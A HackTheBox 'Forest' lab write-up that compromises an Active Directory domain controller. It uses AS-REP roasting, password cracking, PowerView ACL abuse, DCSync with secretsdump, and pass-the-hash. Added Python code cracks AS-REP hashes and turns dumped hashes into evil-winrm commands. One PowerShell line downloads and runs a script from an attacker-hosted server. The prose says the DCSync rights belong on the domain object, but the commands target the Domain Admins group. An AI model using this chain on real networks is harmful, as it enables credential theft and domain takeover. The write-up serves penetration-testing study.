# HackTheBox - Forest Writeup
###### tags: `writeup` `HackTheBox` `Machine` `Easy` `OSCP` `bloodhound` `impacket` `DCsync` `ASREProast` `kerbrute` `AD`
## :computer: Port Scanning
```bash
# Nmap 7.92 scan initiated Sun Aug 14 11:58:06 2022 as: nmap -sV -T4 -sS -sC -v -oN nmap 10.10.10.161
Nmap scan report for forest.htb (10.10.10.161)
Host is up (0.12s latency).
Not shown: 989 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-14 16:05:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h26m50s, deviation: 4h02m31s, median: 6m48s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-08-14T16:05:13
|_ start_date: 2022-08-14T16:03:38
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2022-08-14T09:05:14-07:00
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 14 11:58:34 2022 -- 1 IP address (1 host up) scanned in 27.49 seconds
```
## Services:
- [ ] Port 53 : Simple DNS Plus
- [ ] Port 88 : Microsoft Windows Kerberos
- [ ] Port 135 : Microsoft Windows RPC
- [ ] Port 139 : Windows Netbios-ssn
- [ ] Port 389 : Windows Active Directory LDAP
- [ ] Port 445 : microsoft-ds Windows Server 2016 Standard 14393
- [ ] Port 464 : kpasswd5?
- [ ] Port 593 : ncacn_http Microsoft Windows RPC over HTTP
- [ ] Port 636: tcpwrapped
- [ ] Port 3268 : Windows Active Directory LDAP
- [ ] Port 3269 : tcpwrapped
## :eye: Enumeration
Since Kerberos (port 88) is exposed, we can use kerbrute to enumerate valid usernames: the KDC answers differently for principals that exist and for ones that do not, so no password is needed. HTB.local has to resolve (for instance through an /etc/hosts entry), or pass the IP to `--dc` instead.
```bash
/opt/kerbrute/kerbrute_linux_amd64 userenum --dc HTB.local -d HTB.local /usr/share/seclists/Usernames/Names/names.txt
```
Enumerating with this list reveals these usernames:
- [ ] andy
- [ ] forest
- [ ] lucinda
- [ ] mark
- [ ] sebastien
These accounts alone do not give us anything, so we enumerate further with **enum4linux**:
```bash
sudo enum4linux -a 10.10.10.161
```
Reading the results of this tool (it lists users over RPC through a null session, which this DC allows) we notice that there are more users.

Combining both sources, we have this list:
### Usernames:
- [ ] andy@HTB.local
- [ ] forest@HTB.local
- [ ] lucinda@HTB.local
- [ ] mark@HTB.local
- [ ] sebastien@HTB.local
- [ ] santi@HTB.local
- [ ] administrator@HTB.local
- [ ] svc-alfresco@HTB.local
svc-alfresco is obviously a service account, so it is worth checking whether it has Kerberos pre-authentication disabled (AS-REP roastable): in that case the KDC hands an AS-REP, encrypted with a key derived from the account's password, to anyone who asks for it, and that blob can be cracked offline.
## :bomb: Exploitation
To AS-REP roast the account we use impacket's GetNPUsers (`-no-pass` sends the AS-REQ without pre-authentication data; `-usersfile` would test the whole user list in one go):
```bash
impacket-GetNPUsers HTB.local/svc-alfresco -no-pass
```

The KDC answers with the AS-REP. Its encrypted part is keyed with the NT hash of svc-alfresco (RC4-HMAC, etype 23), and impacket prints it as a `$krb5asrep$23$...` line.
Save that line to a file and crack it with john:
```bash
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
```
john recovers the password:
> s3rvice ($krb5asrep\$23\$svc-alfresco@HTB.LOCAL)
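To make clear what john is actually doing with that `$krb5asrep$23$` line, here is an added example (my own Python, not part of the original writeup, of impacket or of john): it implements the RC4-HMAC (etype 23) check from RFC 4757 and verifies candidate passwords against the checksum carried in the line. The sample line is constructed by sealing a dummy enc-part under the NT hash of `s3rvice`, so its realm, user and blob are made up; only the key-usage value, the MD4 algorithm and the protocol steps are real.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF
AS_REP_KEY_USAGE = 8  # RFC 4757: the RC4-HMAC AS-REP enc-part uses key usage 8, not 3

def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320, pure Python (OpenSSL 3 often disables hashlib's md4)."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK32
    rounds = (  # (boolean function, additive constant, shifts, message-word order) per round
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, shifts, order in rounds:
            for i, w in enumerate(order):  # rotate (a,b,c,d) so every step updates "a"
                a, b, c, d = d, rotl((a + fn(b, c, d) + x[w] + k) & MASK32, shifts[i % 4]), b, c
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4; encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def ntlm_hash(password: str) -> bytes:
    """The RC4-HMAC Kerberos key is simply the NT hash: MD4 of the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))

def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()

def rc4_hmac_seal(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757 encryption: checksum || RC4(K3, confounder || plaintext)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = _hmac_md5(k1, data)  # K2 == K1 for the non-export variant
    return checksum + rc4(_hmac_md5(k1, checksum), data)

def rc4_hmac_verify(key: bytes, usage: int, checksum: bytes, edata: bytes) -> bool:
    """The per-candidate test a cracker runs: K3 from the checksum, decrypt, recompute the HMAC."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    plain = rc4(_hmac_md5(k1, checksum), edata)
    return hmac.compare_digest(_hmac_md5(k1, plain), checksum)

def parse_asrep_line(line: str) -> dict:
    """Accepts '$krb5asrep$23$user@REALM:cksum$edata' (GetNPUsers -format hashcat) and
    '$krb5asrep$user@REALM:cksum$edata' (-format john, where etype 23 is implied)."""
    parts = line.strip().split("$")
    if len(parts) not in (4, 5) or parts[1] != "krb5asrep":
        raise ValueError("not a krb5asrep line")
    etype = int(parts[2]) if len(parts) == 5 else 23
    principal, checksum = parts[-2].split(":")
    user, realm = principal.rsplit("@", 1)
    return {"etype": etype, "user": user, "realm": realm,
            "checksum": bytes.fromhex(checksum), "edata": bytes.fromhex(parts[-1])}

def crack_asrep(line: str, wordlist):
    """Return the first candidate whose NT hash verifies the line, or None."""
    h = parse_asrep_line(line)
    if h["etype"] != 23:
        raise ValueError("only RC4-HMAC (etype 23) handled; etypes 17/18 use PBKDF2-derived keys")
    for candidate in wordlist:
        if rc4_hmac_verify(ntlm_hash(candidate), AS_REP_KEY_USAGE, h["checksum"], h["edata"]):
            return candidate
    return None

def make_sample_line(user: str, realm: str, password: str) -> str:
    """Constructed sample: seal a dummy enc-part under the password's NT hash and print it
    the way GetNPUsers does. The fixed confounder only keeps the output deterministic."""
    blob = rc4_hmac_seal(ntlm_hash(password), AS_REP_KEY_USAGE,
                         b"constructed AS-REP enc-part, not real KDC output", b"\x00" * 8)
    return f"$krb5asrep$23${user}@{realm}:{blob[:16].hex()}${blob[16:].hex()}"

if __name__ == "__main__":
    sample = make_sample_line("svc-alfresco", "HTB.LOCAL", "s3rvice")
    print(sample)
    print("cracked:", crack_asrep(sample, ["123456", "password", "s3rvice"]))
```

Each candidate costs one MD4, three HMAC-MD5 and one RC4, with no salt and no iteration count, which is why rockyou.txt finishes in seconds against etype 23. AS-REPs keyed with AES (etypes 17/18) derive the key with PBKDF2 and are orders of magnitude slower to crack, and re-enabling pre-authentication on the account removes the exposure entirely.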
Knowing the user and the password, we can use evil-winrm to get a shell as svc-alfresco over WinRM (5985/tcp, which is not among nmap's default top 1000 ports and therefore does not appear in the scan above):
```bash
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
```
Now we have a shell as svc-alfresco; for more information about evil-winrm see its [GitHub repository](https://github.com/Hackplayers/evil-winrm).

Now it's time to enumerate and find a way to obtain Administrator privileges.
---
### Root Privesc
Since this is an AD box, we start enumerating with BloodHound. With the credentials for svc-alfresco we can use the bloodhound-python ingestor, which collects everything remotely over LDAP and SMB, so nothing has to be uploaded to the machine:
```bash
bloodhound-python -u svc-alfresco -p s3rvice -ns 10.10.10.161 -d HTB.local -c All
```
This writes a set of JSON files on our machine, which we upload into BloodHound as shown in my previous [bloodhound](https://hackmd.io/@Mecanico/BJo-wm9x5) post.
After uploading them, running the built-in query **Shortest Paths to Domain Admins** shows this:

We have to right click on HTB.local and click **Set as Ending Node**:

This gives us the graph showing the path for the privilege escalation:

Taking a look at the graph we see that the group 'EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL' has **WriteDacl** on the domain object HTB.LOCAL, and that svc-alfresco can add members to that group. Once svc-alfresco is a member, it can modify the domain's DACL to grant itself the replication rights that DCSync relies on, and then dump every NTLM hash from the DC.
Right-clicking the WriteDacl edge in BloodHound and opening **Help** > **Abuse Info** explains how to abuse it for DCSync; I also recommend a reference like [this one](https://burmat.gitbook.io/security/hacking/domain-exploitation#add-exploit-dcsync-rights).
Following the abuse info and that guide, the steps are:
1. Import PowerView
2. Add-DomainGroupMember (add svc-alfresco to EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL)
3. Create the SecureString password object.
4. Create the PSCredential object.
5. Finally, Add-DomainObjectAcl with `-Rights DCSync`, which adds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights for svc-alfresco.
After that we should be able to dump the credential hashes from the DC. The explicit `-Credential` matters: a WinRM session carries no network credentials, so the LDAP write would otherwise fail. Keep in mind as well that AD evaluates the replication rights on the domain object itself, which is the target BloodHound's abuse info uses. These are the commands to enter:
```PowerShell
# 1. Load PowerView in memory from our attacker machine's web server (10.10.16.9)
IEX(New-Object Net.WebClient).downloadString('http://10.10.16.9/PowerView.ps1')
# 2. Add svc-alfresco to the group that holds WriteDacl on the domain object
Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco;
# 3-4. Explicit credentials, because the WinRM session cannot authenticate to LDAP on its own
$pass = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $pass)
# 5. Grant the replication (DCSync) extended rights to svc-alfresco
Add-DomainObjectAcl -Credential $cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity "HTB.LOCAL\Domain Admins" -Rights DCSync
```
###### Failed attempt
If the separate commands do not work after adding the user to Exchange Windows Permissions, run everything as a single line so the ACL change immediately follows the group membership change. I found this approach after finishing the machine, in the 0xdf [writeup](https://0xdf.gitlab.io/2020/03/21/htb-forest.html#exploit).
```powershell
Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco; $username = "htb\svc-alfresco"; $password = "s3rvice"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync
```
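A check worth running once Add-DomainObjectAcl returns, before moving on to secretsdump, as an added example (my own Python, not from the writeup, PowerView or BloodHound): it reads the domain object's security descriptor in SDDL form, for instance the `Sddl` property of `Get-Acl 'AD:\DC=htb,DC=local'` when the ActiveDirectory module's AD: drive is available, and reports whether a principal holds both replication extended rights. The SIDs and SDDL strings in the block are constructed; the GUIDs and access-mask bits are the real AD constants.

```python
import re

# Extended-right GUIDs on the domain object that DCSync (DRSUAPI GetNCChanges) requires.
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DCSYNC_RIGHTS = frozenset({DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL})
ADS_RIGHT_DS_CONTROL_ACCESS = 0x100  # SDDL "CR": extended rights, scoped by the object GUID
GENERIC_ALL = 0x10000000             # SDDL "GA": full control, implies every extended right

ACE_RE = re.compile(r"\(([^()]*)\)")

def parse_dacl(sddl: str) -> list:
    """Return the ACEs of the D: part of an SDDL string as dicts.
    Fields are type;flags;rights;object_guid;inherit_guid;sid (conditional ACEs not handled)."""
    start = sddl.find("D:")
    if start < 0:
        return []
    end = sddl.find("S:", start)
    dacl = sddl[start + 2:end if end >= 0 else len(sddl)]
    aces = []
    for body in ACE_RE.findall(dacl):
        f = (body.split(";") + [""] * 6)[:6]
        aces.append({"type": f[0], "flags": f[1], "rights": f[2],
                     "object": f[3].lower(), "inherit": f[4], "sid": f[5].upper()})
    return aces

def ace_dcsync_rights(ace: dict) -> set:
    """Subset of the DCSync rights one ACE covers (rights are a hex mask or 2-letter tokens)."""
    rights = ace["rights"]
    if rights.startswith("0x"):
        mask = int(rights, 16)
        has_ga, has_cr = bool(mask & GENERIC_ALL), bool(mask & ADS_RIGHT_DS_CONTROL_ACCESS)
    else:
        tokens = {rights[i:i + 2] for i in range(0, len(rights), 2)}
        has_ga, has_cr = "GA" in tokens, "CR" in tokens
    if has_ga or (has_cr and not ace["object"]):  # GA, or CR without a GUID, = all extended rights
        return set(DCSYNC_RIGHTS)
    if has_cr:
        return {ace["object"]} & DCSYNC_RIGHTS
    return set()

def has_dcsync(sddl: str, principal_sids) -> bool:
    """True when the principal (its own SID plus the SIDs of its groups) is allowed both
    replication rights and neither is explicitly denied. Inheritance flags are not resolved,
    and well-known SDDL aliases such as BA only match if you pass them as-is."""
    sids = {s.upper() for s in principal_sids}
    allowed, denied = set(), set()
    for ace in parse_dacl(sddl):
        if ace["sid"] not in sids:
            continue
        if ace["type"] in ("A", "OA"):
            allowed |= ace_dcsync_rights(ace)
        elif ace["type"] in ("D", "OD"):
            denied |= ace_dcsync_rights(ace)
    return DCSYNC_RIGHTS <= (allowed - denied)

# Constructed data: a minimal domain-object DACL before and after
# "Add-DomainObjectAcl ... -PrincipalIdentity svc-alfresco -Rights DCSync". The SID is made up.
SVC_ALFRESCO_SID = "S-1-5-21-1111111111-2222222222-3333333333-1147"
DOMAIN_SDDL_BEFORE = ("O:DAG:DAD:AI(A;;RPLCLORC;;;AU)"
                      f"(OA;;CR;{DS_REPL_GET_CHANGES};;BA)")
DOMAIN_SDDL_AFTER = DOMAIN_SDDL_BEFORE + (
    f"(OA;;CR;{DS_REPL_GET_CHANGES};;{SVC_ALFRESCO_SID})"
    f"(OA;;CR;{DS_REPL_GET_CHANGES_ALL};;{SVC_ALFRESCO_SID})")

if __name__ == "__main__":
    print("svc-alfresco DCSync before:", has_dcsync(DOMAIN_SDDL_BEFORE, [SVC_ALFRESCO_SID]))
    print("svc-alfresco DCSync after: ", has_dcsync(DOMAIN_SDDL_AFTER, [SVC_ALFRESCO_SID]))
```

The same function doubles as a defensive audit: run it over the domain object's DACL for every SID that is not a domain controller or a known replication account, and any hit is a DCSync path that does not belong there.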
After running the commands (or the one-liner) we can use impacket-secretsdump to dump the hashes. This is the DCSync itself: with the replication rights granted above, the tool asks the DC for the NTDS secrets over DRSUAPI, exactly as another domain controller would:
```bash
impacket-secretsdump HTB.local/svc-alfresco:s3rvice@10.10.10.161
```
The output looks something like this:

Each line has the form `user:RID:LM hash:NT hash:::`. The fourth field is the NT hash (often loosely called the NTLM hash; it is not NTLMv1, which is a challenge-response format and cannot be passed). Since the NT hash is all that NTLM authentication needs, we can pass-the-hash as Administrator without cracking anything.
Using evil-winrm we pass the hash and obtain an Administrator shell:
```bash
evil-winrm -i 10.10.10.161 -u Administrator -H NT_Hash
```
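The shape of that output matters for this last step, so here is an added example (my own Python, not from the writeup or from impacket) that parses secretsdump's NTDS lines, selects the accounts worth passing the hash with, and flags NT hashes shared between accounts. The sample output and every hash value in it are constructed; only the two empty-password constants are real.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "": blank password

# domain\user:rid:lmhash:nthash:::  (the domain prefix appears with the DRSUAPI method)
NTDS_LINE = re.compile(
    r"^(?:(?P<domain>[^:\\]+)\\)?(?P<user>[^:\\]+):(?P<rid>\d+)"
    r":(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

def parse_secretsdump(text: str) -> dict:
    """Map account -> {rid, lm, nt}; banner and status lines do not match and are skipped."""
    accounts = {}
    for line in text.splitlines():
        m = NTDS_LINE.match(line.strip())
        if m:
            accounts[m["user"]] = {"rid": int(m["rid"]),
                                   "lm": m["lm"].lower(), "nt": m["nt"].lower()}
    return accounts

def pth_candidates(accounts: dict) -> list:
    """(user, nt) pairs usable for pass-the-hash, lowest RID first:
    machine accounts and accounts with an empty NT hash are skipped."""
    return sorted(
        ((u, a["nt"]) for u, a in accounts.items()
         if not u.endswith("$") and a["nt"] != EMPTY_NT),
        key=lambda pair: accounts[pair[0]]["rid"],
    )

def shared_nt_hashes(accounts: dict) -> dict:
    """nt -> [users] for hashes that appear under more than one account: NT hashes are
    unsalted, so identical hashes mean identical passwords."""
    by_hash = defaultdict(list)
    for u, a in accounts.items():
        if a["nt"] != EMPTY_NT:
            by_hash[a["nt"]].append(u)
    return {h: sorted(us) for h, us in by_hash.items() if len(us) > 1}

def lm_present(accounts: dict) -> list:
    """Accounts that still store a real LM hash (trivially crackable)."""
    return sorted(u for u, a in accounts.items() if a["lm"] != EMPTY_LM)

# Constructed sample in secretsdump's layout; the hash values are placeholders, not real secrets.
SAMPLE_OUTPUT = """\
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
htb.local\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
htb.local\\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
htb.local\\mark:1120:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:44444444444444444444444444444444:::
[*] Cleaning up...
"""

if __name__ == "__main__":
    accounts = parse_secretsdump(SAMPLE_OUTPUT)
    for user, nt in pth_candidates(accounts):
        print(f"evil-winrm -i 10.10.10.161 -u {user} -H {nt}")
    print("password reuse:", shared_nt_hashes(accounts))
    print("LM hashes stored:", lm_present(accounts))
```

The krbtgt hash in that list is the one to treat with most care: it is not useful for pass-the-hash, but it is enough to forge Kerberos tickets, so a DCSync like this one is a domain-wide compromise until krbtgt is rotated twice.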

And that's all folks, we obtained Administrator privileges! Check my media:
---
### You can find me on:
:bird:[**Twitter**](https://twitter.com/Aka_Mecanico)
:desktop_computer: [**Github**](https://github.com/Mec4nico)
:ballot_box_with_check: [**TryHackMe**](https://tryhackme.com/p/mech4nico)
:green_book:[**HackTheBox**](https://www.hackthebox.eu/home/users/profile/336092)